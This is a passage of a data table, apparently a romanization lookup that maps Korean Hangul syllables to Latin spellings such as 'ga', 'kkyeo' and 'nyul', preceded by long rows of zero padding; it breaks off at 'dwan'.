0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"ga","gag","gakk","gags","gan","ganj","ganh","gad","gal","galg","galm","galb","gals","galt","galp","galh","gam","gab","gabs","gas","gass","gang","gaj","gach","gak","gat","gap","gah","gae","gaeg","gaekk","gaegs","gaen","gaenj","gaenh","gaed","gael","gaelg","gaelm","gaelb","gaels","gaelt","gaelp","gaelh","gaem","gaeb","gaebs","gaes","gaess","gaeng","gaej","gaech","gaek","gaet","gaep","gaeh","gya","gyag","gyakk","gyags","gyan","gyanj","gyanh","gyad","gyal","gyalg","gyalm","gyalb","gyals","gyalt","gyalp","gyalh","gyam","gyab","gyabs","gyas","gyass","gyang","gyaj","gyach","gyak","gyat","gyap","gyah","gyae","gyaeg",
"gyaekk","gyaegs","gyaen","gyaenj","gyaenh","gyaed","gyael","gyaelg","gyaelm","gyaelb","gyaels","gyaelt","gyaelp","gyaelh","gyaem","gyaeb","gyaebs","gyaes","gyaess","gyaeng","gyaej","gyaech","gyaek","gyaet","gyaep","gyaeh","geo","geog","geokk","geogs","geon","geonj","geonh","geod","geol","geolg","geolm","geolb","geols","geolt","geolp","geolh","geom","geob","geobs","geos","geoss","geong","geoj","geoch","geok","geot","geop","geoh","ge","geg","gekk","gegs","gen","genj","genh","ged","gel","gelg","gelm","gelb","gels","gelt","gelp","gelh","gem","geb","gebs","ges","gess","geng","gej","gech","gek","get","gep","geh","gyeo","gyeog","gyeokk","gyeogs","gyeon","gyeonj","gyeonh","gyeod","gyeol","gyeolg","gyeolm","gyeolb","gyeols","gyeolt","gyeolp","gyeolh","gyeom","gyeob","gyeobs","gyeos","gyeoss","gyeong","gyeoj","gyeoch","gyeok","gyeot","gyeop","gyeoh","gye","gyeg","gyekk","gyegs","gyen","gyenj","gyenh","gyed","gyel","gyelg","gyelm","gyelb","gyels","gyelt","gyelp","gyelh","gyem","gyeb","gyebs",
"gyes","gyess","gyeng","gyej","gyech","gyek","gyet","gyep","gyeh","go","gog","gokk","gogs","gon","gonj","gonh","god","gol","golg","golm","golb","gols","golt","golp","golh","gom","gob","gobs","gos","goss","gong","goj","goch","gok","got","gop","goh","gwa","gwag","gwakk","gwags","gwan","gwanj","gwanh","gwad","gwal","gwalg","gwalm","gwalb","gwals","gwalt","gwalp","gwalh","gwam","gwab","gwabs","gwas","gwass","gwang","gwaj","gwach","gwak","gwat","gwap","gwah","gwae","gwaeg","gwaekk","gwaegs","gwaen","gwaenj","gwaenh","gwaed","gwael","gwaelg","gwaelm","gwaelb","gwaels","gwaelt","gwaelp","gwaelh","gwaem","gwaeb","gwaebs","gwaes","gwaess","gwaeng","gwaej","gwaech","gwaek","gwaet","gwaep","gwaeh","goe","goeg","goekk","goegs","goen","goenj","goenh","goed","goel","goelg","goelm","goelb","goels","goelt","goelp","goelh","goem","goeb","goebs","goes","goess","goeng","goej","goech","goek","goet","goep","goeh","gyo","gyog","gyokk","gyogs","gyon","gyonj","gyonh","gyod",
"gyol","gyolg","gyolm","gyolb","gyols","gyolt","gyolp","gyolh","gyom","gyob","gyobs","gyos","gyoss","gyong","gyoj","gyoch","gyok","gyot","gyop","gyoh","gu","gug","gukk","gugs","gun","gunj","gunh","gud","gul","gulg","gulm","gulb","guls","gult","gulp","gulh","gum","gub","gubs","gus","guss","gung","guj","guch","guk","gut","gup","guh","gwo","gwog","gwokk","gwogs","gwon","gwonj","gwonh","gwod","gwol","gwolg","gwolm","gwolb","gwols","gwolt","gwolp","gwolh","gwom","gwob","gwobs","gwos","gwoss","gwong","gwoj","gwoch","gwok","gwot","gwop","gwoh","gwe","gweg","gwekk","gwegs","gwen","gwenj","gwenh","gwed","gwel","gwelg","gwelm","gwelb","gwels","gwelt","gwelp","gwelh","gwem","gweb","gwebs","gwes","gwess","gweng","gwej","gwech","gwek","gwet","gwep","gweh","gwi","gwig","gwikk","gwigs","gwin","gwinj","gwinh","gwid","gwil","gwilg","gwilm","gwilb","gwils","gwilt","gwilp","gwilh","gwim","gwib","gwibs","gwis","gwiss","gwing","gwij","gwich","gwik",
"gwit","gwip","gwih","gyu","gyug","gyukk","gyugs","gyun","gyunj","gyunh","gyud","gyul","gyulg","gyulm","gyulb","gyuls","gyult","gyulp","gyulh","gyum","gyub","gyubs","gyus","gyuss","gyung","gyuj","gyuch","gyuk","gyut","gyup","gyuh","geu","geug","geukk","geugs","geun","geunj","geunh","geud","geul","geulg","geulm","geulb","geuls","geult","geulp","geulh","geum","geub","geubs","geus","geuss","geung","geuj","geuch","geuk","geut","geup","geuh","gui","guig","guikk","guigs","guin","guinj","guinh","guid","guil","guilg","guilm","guilb","guils","guilt","guilp","guilh","guim","guib","guibs","guis","guiss","guing","guij","guich","guik","guit","guip","guih","gi","gig","gikk","gigs","gin","ginj","ginh","gid","gil","gilg","gilm","gilb","gils","gilt","gilp","gilh","gim","gib","gibs","gis","giss","ging","gij","gich","gik","git","gip","gih","kka","kkag","kkakk","kkags","kkan","kkanj","kkanh","kkad","kkal","kkalg","kkalm","kkalb","kkals","kkalt",
"kkalp","kkalh","kkam","kkab","kkabs","kkas","kkass","kkang","kkaj","kkach","kkak","kkat","kkap","kkah","kkae","kkaeg","kkaekk","kkaegs","kkaen","kkaenj","kkaenh","kkaed","kkael","kkaelg","kkaelm","kkaelb","kkaels","kkaelt","kkaelp","kkaelh","kkaem","kkaeb","kkaebs","kkaes","kkaess","kkaeng","kkaej","kkaech","kkaek","kkaet","kkaep","kkaeh","kkya","kkyag","kkyakk","kkyags","kkyan","kkyanj","kkyanh","kkyad","kkyal","kkyalg","kkyalm","kkyalb","kkyals","kkyalt","kkyalp","kkyalh","kkyam","kkyab","kkyabs","kkyas","kkyass","kkyang","kkyaj","kkyach","kkyak","kkyat","kkyap","kkyah","kkyae","kkyaeg","kkyaekk","kkyaegs","kkyaen","kkyaenj","kkyaenh","kkyaed","kkyael","kkyaelg","kkyaelm","kkyaelb","kkyaels","kkyaelt","kkyaelp","kkyaelh","kkyaem","kkyaeb","kkyaebs","kkyaes","kkyaess","kkyaeng","kkyaej","kkyaech","kkyaek","kkyaet","kkyaep","kkyaeh","kkeo","kkeog","kkeokk","kkeogs","kkeon","kkeonj","kkeonh","kkeod","kkeol","kkeolg","kkeolm","kkeolb","kkeols","kkeolt","kkeolp","kkeolh","kkeom","kkeob","kkeobs","kkeos","kkeoss","kkeong","kkeoj","kkeoch","kkeok","kkeot","kkeop","kkeoh","kke","kkeg","kkekk",
"kkegs","kken","kkenj","kkenh","kked","kkel","kkelg","kkelm","kkelb","kkels","kkelt","kkelp","kkelh","kkem","kkeb","kkebs","kkes","kkess","kkeng","kkej","kkech","kkek","kket","kkep","kkeh","kkyeo","kkyeog","kkyeokk","kkyeogs","kkyeon","kkyeonj","kkyeonh","kkyeod","kkyeol","kkyeolg","kkyeolm","kkyeolb","kkyeols","kkyeolt","kkyeolp","kkyeolh","kkyeom","kkyeob","kkyeobs","kkyeos","kkyeoss","kkyeong","kkyeoj","kkyeoch","kkyeok","kkyeot","kkyeop","kkyeoh","kkye","kkyeg","kkyekk","kkyegs","kkyen","kkyenj","kkyenh","kkyed","kkyel","kkyelg","kkyelm","kkyelb","kkyels","kkyelt","kkyelp","kkyelh","kkyem","kkyeb","kkyebs","kkyes","kkyess","kkyeng","kkyej","kkyech","kkyek","kkyet","kkyep","kkyeh","kko","kkog","kkokk","kkogs","kkon","kkonj","kkonh","kkod","kkol","kkolg","kkolm","kkolb","kkols","kkolt","kkolp","kkolh","kkom","kkob","kkobs","kkos","kkoss","kkong","kkoj","kkoch","kkok","kkot","kkop","kkoh","kkwa","kkwag","kkwakk","kkwags","kkwan","kkwanj","kkwanh","kkwad","kkwal","kkwalg","kkwalm","kkwalb","kkwals","kkwalt","kkwalp","kkwalh","kkwam","kkwab","kkwabs","kkwas",
"kkwass","kkwang","kkwaj","kkwach","kkwak","kkwat","kkwap","kkwah","kkwae","kkwaeg","kkwaekk","kkwaegs","kkwaen","kkwaenj","kkwaenh","kkwaed","kkwael","kkwaelg","kkwaelm","kkwaelb","kkwaels","kkwaelt","kkwaelp","kkwaelh","kkwaem","kkwaeb","kkwaebs","kkwaes","kkwaess","kkwaeng","kkwaej","kkwaech","kkwaek","kkwaet","kkwaep","kkwaeh","kkoe","kkoeg","kkoekk","kkoegs","kkoen","kkoenj","kkoenh","kkoed","kkoel","kkoelg","kkoelm","kkoelb","kkoels","kkoelt","kkoelp","kkoelh","kkoem","kkoeb","kkoebs","kkoes","kkoess","kkoeng","kkoej","kkoech","kkoek","kkoet","kkoep","kkoeh","kkyo","kkyog","kkyokk","kkyogs","kkyon","kkyonj","kkyonh","kkyod","kkyol","kkyolg","kkyolm","kkyolb","kkyols","kkyolt","kkyolp","kkyolh","kkyom","kkyob","kkyobs","kkyos","kkyoss","kkyong","kkyoj","kkyoch","kkyok","kkyot","kkyop","kkyoh","kku","kkug","kkukk","kkugs","kkun","kkunj","kkunh","kkud","kkul","kkulg","kkulm","kkulb","kkuls","kkult","kkulp","kkulh","kkum","kkub","kkubs","kkus","kkuss","kkung","kkuj","kkuch","kkuk","kkut","kkup","kkuh","kkwo","kkwog","kkwokk","kkwogs","kkwon","kkwonj","kkwonh","kkwod","kkwol",
"kkwolg","kkwolm","kkwolb","kkwols","kkwolt","kkwolp","kkwolh","kkwom","kkwob","kkwobs","kkwos","kkwoss","kkwong","kkwoj","kkwoch","kkwok","kkwot","kkwop","kkwoh","kkwe","kkweg","kkwekk","kkwegs","kkwen","kkwenj","kkwenh","kkwed","kkwel","kkwelg","kkwelm","kkwelb","kkwels","kkwelt","kkwelp","kkwelh","kkwem","kkweb","kkwebs","kkwes","kkwess","kkweng","kkwej","kkwech","kkwek","kkwet","kkwep","kkweh","kkwi","kkwig","kkwikk","kkwigs","kkwin","kkwinj","kkwinh","kkwid","kkwil","kkwilg","kkwilm","kkwilb","kkwils","kkwilt","kkwilp","kkwilh","kkwim","kkwib","kkwibs","kkwis","kkwiss","kkwing","kkwij","kkwich","kkwik","kkwit","kkwip","kkwih","kkyu","kkyug","kkyukk","kkyugs","kkyun","kkyunj","kkyunh","kkyud","kkyul","kkyulg","kkyulm","kkyulb","kkyuls","kkyult","kkyulp","kkyulh","kkyum","kkyub","kkyubs","kkyus","kkyuss","kkyung","kkyuj","kkyuch","kkyuk","kkyut","kkyup","kkyuh","kkeu","kkeug","kkeukk","kkeugs","kkeun","kkeunj","kkeunh","kkeud","kkeul","kkeulg","kkeulm","kkeulb","kkeuls","kkeult","kkeulp","kkeulh","kkeum","kkeub","kkeubs","kkeus","kkeuss","kkeung","kkeuj","kkeuch","kkeuk","kkeut",
"kkeup","kkeuh","kkui","kkuig","kkuikk","kkuigs","kkuin","kkuinj","kkuinh","kkuid","kkuil","kkuilg","kkuilm","kkuilb","kkuils","kkuilt","kkuilp","kkuilh","kkuim","kkuib","kkuibs","kkuis","kkuiss","kkuing","kkuij","kkuich","kkuik","kkuit","kkuip","kkuih","kki","kkig","kkikk","kkigs","kkin","kkinj","kkinh","kkid","kkil","kkilg","kkilm","kkilb","kkils","kkilt","kkilp","kkilh","kkim","kkib","kkibs","kkis","kkiss","kking","kkij","kkich","kkik","kkit","kkip","kkih","na","nag","nakk","nags","nan","nanj","nanh","nad","nal","nalg","nalm","nalb","nals","nalt","nalp","nalh","nam","nab","nabs","nas","nass","nang","naj","nach","nak","nat","nap","nah","nae","naeg","naekk","naegs","naen","naenj","naenh","naed","nael","naelg","naelm","naelb","naels","naelt","naelp","naelh","naem","naeb","naebs","naes","naess","naeng","naej","naech","naek","naet","naep","naeh","nya","nyag","nyakk","nyags","nyan","nyanj","nyanh","nyad","nyal","nyalg","nyalm","nyalb","nyals","nyalt","nyalp",
"nyalh","nyam","nyab","nyabs","nyas","nyass","nyang","nyaj","nyach","nyak","nyat","nyap","nyah","nyae","nyaeg","nyaekk","nyaegs","nyaen","nyaenj","nyaenh","nyaed","nyael","nyaelg","nyaelm","nyaelb","nyaels","nyaelt","nyaelp","nyaelh","nyaem","nyaeb","nyaebs","nyaes","nyaess","nyaeng","nyaej","nyaech","nyaek","nyaet","nyaep","nyaeh","neo","neog","neokk","neogs","neon","neonj","neonh","neod","neol","neolg","neolm","neolb","neols","neolt","neolp","neolh","neom","neob","neobs","neos","neoss","neong","neoj","neoch","neok","neot","neop","neoh","ne","neg","nekk","negs","nen","nenj","nenh","ned","nel","nelg","nelm","nelb","nels","nelt","nelp","nelh","nem","neb","nebs","nes","ness","neng","nej","nech","nek","net","nep","neh","nyeo","nyeog","nyeokk","nyeogs","nyeon","nyeonj","nyeonh","nyeod","nyeol","nyeolg","nyeolm","nyeolb","nyeols","nyeolt","nyeolp","nyeolh","nyeom","nyeob","nyeobs","nyeos","nyeoss","nyeong","nyeoj","nyeoch","nyeok","nyeot","nyeop","nyeoh","nye","nyeg","nyekk","nyegs",
"nyen","nyenj","nyenh","nyed","nyel","nyelg","nyelm","nyelb","nyels","nyelt","nyelp","nyelh","nyem","nyeb","nyebs","nyes","nyess","nyeng","nyej","nyech","nyek","nyet","nyep","nyeh","no","nog","nokk","nogs","non","nonj","nonh","nod","nol","nolg","nolm","nolb","nols","nolt","nolp","nolh","nom","nob","nobs","nos","noss","nong","noj","noch","nok","not","nop","noh","nwa","nwag","nwakk","nwags","nwan","nwanj","nwanh","nwad","nwal","nwalg","nwalm","nwalb","nwals","nwalt","nwalp","nwalh","nwam","nwab","nwabs","nwas","nwass","nwang","nwaj","nwach","nwak","nwat","nwap","nwah","nwae","nwaeg","nwaekk","nwaegs","nwaen","nwaenj","nwaenh","nwaed","nwael","nwaelg","nwaelm","nwaelb","nwaels","nwaelt","nwaelp","nwaelh","nwaem","nwaeb","nwaebs","nwaes","nwaess","nwaeng","nwaej","nwaech","nwaek","nwaet","nwaep","nwaeh","noe","noeg","noekk","noegs","noen","noenj","noenh","noed","noel","noelg","noelm","noelb","noels","noelt","noelp","noelh","noem","noeb","noebs","noes","noess",
"noeng","noej","noech","noek","noet","noep","noeh","nyo","nyog","nyokk","nyogs","nyon","nyonj","nyonh","nyod","nyol","nyolg","nyolm","nyolb","nyols","nyolt","nyolp","nyolh","nyom","nyob","nyobs","nyos","nyoss","nyong","nyoj","nyoch","nyok","nyot","nyop","nyoh","nu","nug","nukk","nugs","nun","nunj","nunh","nud","nul","nulg","nulm","nulb","nuls","nult","nulp","nulh","num","nub","nubs","nus","nuss","nung","nuj","nuch","nuk","nut","nup","nuh","nwo","nwog","nwokk","nwogs","nwon","nwonj","nwonh","nwod","nwol","nwolg","nwolm","nwolb","nwols","nwolt","nwolp","nwolh","nwom","nwob","nwobs","nwos","nwoss","nwong","nwoj","nwoch","nwok","nwot","nwop","nwoh","nwe","nweg","nwekk","nwegs","nwen","nwenj","nwenh","nwed","nwel","nwelg","nwelm","nwelb","nwels","nwelt","nwelp","nwelh","nwem","nweb","nwebs","nwes","nwess","nweng","nwej","nwech","nwek","nwet","nwep","nweh","nwi","nwig","nwikk","nwigs","nwin","nwinj","nwinh","nwid","nwil","nwilg",
"nwilm","nwilb","nwils","nwilt","nwilp","nwilh","nwim","nwib","nwibs","nwis","nwiss","nwing","nwij","nwich","nwik","nwit","nwip","nwih","nyu","nyug","nyukk","nyugs","nyun","nyunj","nyunh","nyud","nyul","nyulg","nyulm","nyulb","nyuls","nyult","nyulp","nyulh","nyum","nyub","nyubs","nyus","nyuss","nyung","nyuj","nyuch","nyuk","nyut","nyup","nyuh","neu","neug","neukk","neugs","neun","neunj","neunh","neud","neul","neulg","neulm","neulb","neuls","neult","neulp","neulh","neum","neub","neubs","neus","neuss","neung","neuj","neuch","neuk","neut","neup","neuh","nui","nuig","nuikk","nuigs","nuin","nuinj","nuinh","nuid","nuil","nuilg","nuilm","nuilb","nuils","nuilt","nuilp","nuilh","nuim","nuib","nuibs","nuis","nuiss","nuing","nuij","nuich","nuik","nuit","nuip","nuih","ni","nig","nikk","nigs","nin","ninj","ninh","nid","nil","nilg","nilm","nilb","nils","nilt","nilp","nilh","nim","nib","nibs","nis","niss","ning","nij","nich","nik","nit","nip",
"nih","da","dag","dakk","dags","dan","danj","danh","dad","dal","dalg","dalm","dalb","dals","dalt","dalp","dalh","dam","dab","dabs","das","dass","dang","daj","dach","dak","dat","dap","dah","dae","daeg","daekk","daegs","daen","daenj","daenh","daed","dael","daelg","daelm","daelb","daels","daelt","daelp","daelh","daem","daeb","daebs","daes","daess","daeng","daej","daech","daek","daet","daep","daeh","dya","dyag","dyakk","dyags","dyan","dyanj","dyanh","dyad","dyal","dyalg","dyalm","dyalb","dyals","dyalt","dyalp","dyalh","dyam","dyab","dyabs","dyas","dyass","dyang","dyaj","dyach","dyak","dyat","dyap","dyah","dyae","dyaeg","dyaekk","dyaegs","dyaen","dyaenj","dyaenh","dyaed","dyael","dyaelg","dyaelm","dyaelb","dyaels","dyaelt","dyaelp","dyaelh","dyaem","dyaeb","dyaebs","dyaes","dyaess","dyaeng","dyaej","dyaech","dyaek","dyaet","dyaep","dyaeh","deo","deog","deokk","deogs","deon","deonj","deonh","deod","deol","deolg","deolm","deolb","deols","deolt","deolp","deolh",
"deom","deob","deobs","deos","deoss","deong","deoj","deoch","deok","deot","deop","deoh","de","deg","dekk","degs","den","denj","denh","ded","del","delg","delm","delb","dels","delt","delp","delh","dem","deb","debs","des","dess","deng","dej","dech","dek","det","dep","deh","dyeo","dyeog","dyeokk","dyeogs","dyeon","dyeonj","dyeonh","dyeod","dyeol","dyeolg","dyeolm","dyeolb","dyeols","dyeolt","dyeolp","dyeolh","dyeom","dyeob","dyeobs","dyeos","dyeoss","dyeong","dyeoj","dyeoch","dyeok","dyeot","dyeop","dyeoh","dye","dyeg","dyekk","dyegs","dyen","dyenj","dyenh","dyed","dyel","dyelg","dyelm","dyelb","dyels","dyelt","dyelp","dyelh","dyem","dyeb","dyebs","dyes","dyess","dyeng","dyej","dyech","dyek","dyet","dyep","dyeh","do","dog","dokk","dogs","don","donj","donh","dod","dol","dolg","dolm","dolb","dols","dolt","dolp","dolh","dom","dob","dobs","dos","doss","dong","doj","doch","dok","dot","dop","doh","dwa","dwag","dwakk","dwags","dwan",
